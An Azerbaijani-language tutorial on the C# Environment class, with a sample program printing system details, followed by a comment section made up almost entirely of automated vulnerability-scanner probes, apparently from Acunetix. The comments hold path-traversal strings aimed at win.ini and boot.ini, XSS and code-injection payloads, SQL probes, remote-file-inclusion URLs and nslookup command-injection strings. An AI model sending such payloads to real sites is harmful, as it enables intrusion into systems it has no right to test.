Sistem məlumatlarının əldə olunması, Environment sinfi

      Salam. Bu məqaləmizdə, C# ilə cari icra olunan sistem və platform haqqında məlumatları əldə etməyi öyrənəcəyik. Məsələn, kompüterin adını, Sistemin versiyasını, daxili prosessorların (CPU – Central Processing Unit) sayını və s. Kimi məlumatların alınmasını öyrənəcəyik. Əslində aşağı səviyyəli, məsələn kompüterə quraşdırılmış ekran kartının adını və xüsusiyyətlərini, prosessorun tezliyini kimi məlumatların alınması sistemə sorğu göndərilməsi və nəticənin alınması vasitəsi ilə həyata keçirilir. Amma yuxarıda qeyd olunan nisbətən yuxarı səviyyəli məlumatları rahatlıqla əldə etməyimiz üçün Environment sinfi hazırlanmışdır. Environment sinfi System.dll assemblerində yer alır və üzvlərinin hamısı statikdir. Yəni, Environment sinfindəki üzvləri çağırmaq üçün, bu sinfə aid bir dəyişənə ehtiyacımız yoxdur. Visual Studio üzərində gələn “Object browser” adlı alətlə bu sinfi kəşf edək. Görərik ki, Environment sinfi aşağıdakı üzvlərdən ibarətdir:

Environment sinfi

Bu üzvlərdən ən vacib olanları qeyd edək:

Exit() – int tipində parametr alır və çıxış kodu bu parametrlə üst-üstə düşən proqramın işini dayandırır (tələsməyin, nə olduğunu biləcəksiniz).
FailFast() – İcra olunan proqramın işini dərhal dayandırır və dayanma səbibini string tipdə parametr kimi qəbul edərək həmin xətanı “log” – a yazır. Bu metodun yenidən yüklənmiş ikinci variantı isə, log faylına xəta kimi, metodun ikinci parametrinə qeyd olunan Exception tipdə obyekti  “serialize” edir.

GetCommandLineArgs() – cari icra olunan proqram üçün terminal əmrləri tooplusunu string tipdə massiv olaraq qaytarır.

GetLogicalDrivers() – kompüterə qoşulmuş məntiqi sürücülərin adını string tipdə massiv kimi qaytarır. Məsələn, sərt diskin (HDD) hissələrini, diskovod qurğusunun adını, aktiv USB portlarının adını və s.

Environment sinfinin xüsusiyyətləri (properties)

CommandLine – Cari proses üçün tək bir əmr sətrini string olaraq qaytarır.

CurrentDirectory – Cari icra olunan proqramın sistemdəki tam lokasiyasını (ünvanını) verir.

ExitCode – cari proqram üçün çıxış kodunu təyin edir. Yuxarıda qeyd etdiyimiz Exit() metodu parametr olaraq bu xüsusiyyətə mənimsədilən qiyməti alır.

Is64OperatingSystem – bu xüsusiyyət bool tipdə dəyər qaytarır. Əgər true qiymət qaytarsa, o deməkdir ki, sistemimiz 64 bit arxitekturaya malikdir.


64BitProcess – Cari icra olunan proqram 64 bit struktura malikdirsə (bunun sistemin arxitekturasına dəxli yoxdur) true qiymət qaytarır.

MachineName – kompüterin adını (fiziki olaraq yox) qaytarır. Yəni kompüterə sistem yükləyəndə (xalq dilində desək, formatlayanda) təyin etdiyimiz adı özündə saxlayır.

OSVersion – Əməliyyat sisteminin versiyasını qaytarır.

ProcessorCount – Daxili prosessorların (CPU) sayını qaytarır.

SystemDirectory – İcra olunan sistemin diskdəki direktoriyasını qaytarır.

TickCount – Sistem açılandan bu yana keçən zamanı millisaniyə olaraq qaytarır.

UserDomainName – Mövcud istifadəçi üçün şəbəkə domenn adını qaytarır.

UserName – Hal hazırda sistemdə aktiv olan istifadəçinin adını verir.

İndi buna aid bir proqram nümunəsinə baxaq. Bunu konsol proyekti üzərində göstərək. “SistemMelumatlari” adlı bir konsol proyekt yaradaq.
Environment sinfi

using System;
class Program
{
  static void Main()
  {
    Console.WriteLine("Komputer adi: " + Environment.MachineName);
    Console.WriteLine("Istifadeci adi: " + Environment.UserName);
    Console.WriteLine("Sistem versiyasi: " + Environment.OSVersion);
    Console.WriteLine("CPU sayi: " + Environment.ProcessorCount);
    if (Environment.Is64BitOperatingSystem)
      Console.WriteLine("Sisteminiz 64 bit arxitekturaya malikdir");
    else
      Console.WriteLine("Sisteminiz 32 bit arxitekturaya malikdir");
    Console.WriteLine("Suruculerin siyahisi: \n");
    string[] suruculer = Environment.GetLogicalDrives();
    foreach (string surucu in suruculer)
      Console.WriteLine(surucu);
    Console.ReadKey();
  }
}

Nəticə aşağıdakı kimi olacaq:
Environment sinfi

705    20.11.2013
C# Environment Proqramlaşdırma Sistem Windows İnfoŞərhlər (209)
sejjvpfd<%div style=width:expression(0cbC(9127))> 02.09.2017 10:23

1


hspkrchf 02.09.2017 10:23

������������������������������������������������windows��win.ini


sejjvpfd&lt;ScRiPt&gt;0cbC(9416)&lt;/sCripT&gt; 02.09.2017 10:23

1


hspkrchf 02.09.2017 10:23

../../../../../../../../../../windows/win.ini.jpg


sejjvpfd\u003CScRiPt\0cbC(9019)\u003C/sCripT\u003E 02.09.2017 10:23

1


hspkrchf 02.09.2017 10:23

../../../../../../../../../../boot.ini


%73%65%6A%6A%76%70%66%64%3C%53%63%52%69%50%74%20%3E%30%63%62%43%289653%29%3C%2F%73%43%72%69%70%54%3E 02.09.2017 10:23

1


hspkrchf 02.09.2017 10:23

../../../../../../../../../../windows/win.ini


{{10000186*9999130}} 02.09.2017 10:23

1


CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0 02.09.2017 10:23

1


acux9342��z1��z2a�bcxuca9342 02.09.2017 10:22

1


acu7515<s1﹥s2ʺs3ʹuca7515 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


sejjvpfd_9514 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


(select convert(int,CHAR(65))) 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


�''�"" 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


�'�" 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


JyI= 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


@@56LMP 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


1���� 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


\ 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


1'" 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


nqatgmti 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


iqhjchyh 02.09.2017 10:22

1


fqqhcffr 02.09.2017 10:21

/\www.vulnweb.com


fqqhcffr 02.09.2017 10:21

//www.vulnweb.com


WEB-INF\web.xml 02.09.2017 10:21

1


fqqhcffr 02.09.2017 10:21

http://www.vulnweb.com


WEB-INF/web.xml 02.09.2017 10:21

1


fqqhcffr 02.09.2017 10:21

950417


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ 02.09.2017 10:21

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini 02.09.2017 10:21

1


fqqhcffr 02.09.2017 10:21

/www.vulnweb.com


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini 02.09.2017 10:21

1


/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 02.09.2017 10:21

1


..\..\..\..\..\..\..\..\windows\win.ini 02.09.2017 10:21

1


................windowswin.ini 02.09.2017 10:21

1


kfhdiftu 02.09.2017 10:21

${@print(md5(acunetix_wvs_security_test))}\


nqatgmti 02.09.2017 10:21

1


������������������������������������������������windows��win.ini 02.09.2017 10:21

1


kfhdiftu 02.09.2017 10:21

${@print(md5(acunetix_wvs_security_test))}


nqatgmti 02.09.2017 10:21

1


../../../../../../../../../../windows/win.ini.jpg 02.09.2017 10:21

1


kfhdiftu 02.09.2017 10:21

";print(md5(acunetix_wvs_security_test));$a="


nqatgmti 02.09.2017 10:21

1


nwvmqwsp 02.09.2017 10:21

WriteComment/.


../../../../../../../../../../boot.ini 02.09.2017 10:21

1


kfhdiftu 02.09.2017 10:21

';print(md5(acunetix_wvs_security_test));$a='


nqatgmti 02.09.2017 10:21

1


nwvmqwsp 02.09.2017 10:21

WriteComment


../../../../../../../../../../windows/win.ini 02.09.2017 10:21

1


kfhdiftu 02.09.2017 10:21

;print(md5(acunetix_wvs_security_test));


nqatgmti 02.09.2017 10:21

1


nwvmqwsp 02.09.2017 10:21

WriteComment


nqatgmti 02.09.2017 10:21

1


nwvmqwsp 02.09.2017 10:21

1


nqatgmti 02.09.2017 10:21

1


nqatgmti 02.09.2017 10:21

1


nqatgmti 02.09.2017 10:21

1


/\www.vulnweb.com 02.09.2017 10:21

1


//www.vulnweb.com 02.09.2017 10:21

1


http://www.vulnweb.com 02.09.2017 10:21

1


eiuvmfej 02.09.2017 10:21

testasp.vulnweb.com


966515 02.09.2017 10:21

1


eiuvmfej 02.09.2017 10:21

http://testasp.vulnweb.com/t/fit.txt?.jpg


/www.vulnweb.com 02.09.2017 10:21

1


eiuvmfej 02.09.2017 10:21

Http://testasp.vulnweb.com/t/fit.txt


eiuvmfej 02.09.2017 10:21

1some_inexistent_file_with_long_name.jpg


oibvkufp 02.09.2017 10:21

'"


WriteComment/. 02.09.2017 10:21

1


eiuvmfej 02.09.2017 10:21

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


WriteComment 02.09.2017 10:21

1


WriteComment 02.09.2017 10:21

1


nwvmqwsp 02.09.2017 10:21

1


${@print(md5(acunetix_wvs_security_test))}\ 02.09.2017 10:21

1


'" 02.09.2017 10:21

1


${@print(md5(acunetix_wvs_security_test))} 02.09.2017 10:21

1


sejjvpfd 02.09.2017 10:21

1


";print(md5(acunetix_wvs_security_test));$a=" 02.09.2017 10:21

1


';print(md5(acunetix_wvs_security_test));$a=' 02.09.2017 10:21

1


;print(md5(acunetix_wvs_security_test)); 02.09.2017 10:20

1


oibvkufp 02.09.2017 10:20

1


fqqhcffr 02.09.2017 10:20

1


maukeakp 02.09.2017 10:20

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


nwvmqwsp 02.09.2017 10:20

1


nwvmqwsp 02.09.2017 10:20

1


vkeeuxsu 02.09.2017 10:20

^(#$!@#$)(()))******


nwvmqwsp 02.09.2017 10:20

1


vkeeuxsu 02.09.2017 10:20

!(()&&!|*|*|


testasp.vulnweb.com 02.09.2017 10:20

1


nwvmqwsp 02.09.2017 10:20

1


vkeeuxsu 02.09.2017 10:20

)


http://testasp.vulnweb.com/t/fit.txt?.jpg 02.09.2017 10:20

1


))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 02.09.2017 10:20

1


wmvxrhnf 02.09.2017 10:20

http://hitTxjJGr3dlS.bxss.me/


Http://testasp.vulnweb.com/t/fit.txt 02.09.2017 10:20

1


1some_inexistent_file_with_long_name.jpg 02.09.2017 10:20

1


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg 02.09.2017 10:20

1


maukeakp 02.09.2017 10:20

1


http://hitI6erOtDQYl.bxss.me/ 02.09.2017 10:20

1


kfhdiftu 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


kfhdiftu 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


kfhdiftu 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


kfhdiftu 02.09.2017 10:20

1


^(#$!@#$)(()))****** 02.09.2017 10:20

1


dpptbasb 02.09.2017 10:20

'"()


hspkrchf 02.09.2017 10:20

1


tsmfweyv 02.09.2017 10:20

1


kfhdiftu 02.09.2017 10:20

1


wmvxrhnf 02.09.2017 10:20

1


!(()&&!|*|*| 02.09.2017 10:20

1


dpptbasb 02.09.2017 10:20


hspkrchf 02.09.2017 10:20

1


tsmfweyv 02.09.2017 10:20

12345'"\'\");|]*{ <>�''💩


) 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


tsmfweyv 02.09.2017 10:20


hspkrchf 02.09.2017 10:20

1


tsmfweyv 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


nwvmqwsp 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


gmbfaeij 02.09.2017 10:20

http://testasp.vulnweb.com/t/xss.html?%00.jpg


'"() 02.09.2017 10:20

1


hspkrchf 02.09.2017 10:20

1


02.09.2017 10:20

1


eiuvmfej 02.09.2017 10:20

1


eiuvmfej 02.09.2017 10:20

1


http://testasp.vulnweb.com/t/xss.html?%00.jpg 02.09.2017 10:20

1


eiuvmfej 02.09.2017 10:20

1


vkeeuxsu 02.09.2017 10:20

1


eiuvmfej 02.09.2017 10:20

1


vkeeuxsu 02.09.2017 10:20

1


eiuvmfej 02.09.2017 10:20

1


vkeeuxsu 02.09.2017 10:20

1


dpptbasb 02.09.2017 10:20

1


gmbfaeij 02.09.2017 10:20

1


dpptbasb 02.09.2017 10:20

1


tsmfweyv 02.09.2017 10:20

1


12345'"\'\");|]*{ <>�''💩 02.09.2017 10:20

1


02.09.2017 10:20

1


tsmfweyv 02.09.2017 10:20

1


hakrarnl 02.09.2017 10:20

"+response.write(9913255*9555186)+"


seelbfbv 02.09.2017 10:20

&nslookup 7mCybFDe&'\"`0&nslookup 7mCybFDe&`'


hakrarnl 02.09.2017 10:20

'+response.write(9913255*9555186)+'


seelbfbv 02.09.2017 10:20

$(nslookup piQUaLEg)


hakrarnl 02.09.2017 10:19

response.write(9913255*9555186)


seelbfbv 02.09.2017 10:19

set|set&set


Nko3RjNVNW8= 02.09.2017 10:19

1


"+response.write(9739294*9229813)+" 02.09.2017 10:19

1


tsmfweyv 02.09.2017 10:19

1


&nslookup nc15xqrq&'\"`0&nslookup nc15xqrq&`' 02.09.2017 10:19

1


jldwakqx 02.09.2017 10:19

${9999973+9999413}


'+response.write(9739294*9229813)+' 02.09.2017 10:19

1


tsmfweyv 02.09.2017 10:19

1


$(nslookup UHTCcbVl) 02.09.2017 10:19

1


response.write(9739294*9229813) 02.09.2017 10:19

1


tsmfweyv 02.09.2017 10:19

1


set|set&set 02.09.2017 10:19

1


tsmfweyv 02.09.2017 10:19

1


${9999605+9999562} 02.09.2017 10:19

1


jldwakqx 02.09.2017 10:19

1


hakrarnl 02.09.2017 10:19

1


seelbfbv 02.09.2017 10:19

1


hakrarnl 02.09.2017 10:19

1


rbtmtvjm 02.09.2017 10:19

M7vvWokK


seelbfbv 02.09.2017 10:19

1


hakrarnl 02.09.2017 10:19

1


seelbfbv 02.09.2017 10:19

1


tsmfweyv 02.09.2017 10:19

1


rKaPt6t5 02.09.2017 10:19

1


rbtmtvjm 02.09.2017 10:19

1


iqhjchyh 02.09.2017 10:19

1


iqhjchyh 02.09.2017 10:19

1


topwnvtw 02.09.2017 10:17

1


Şərh yazın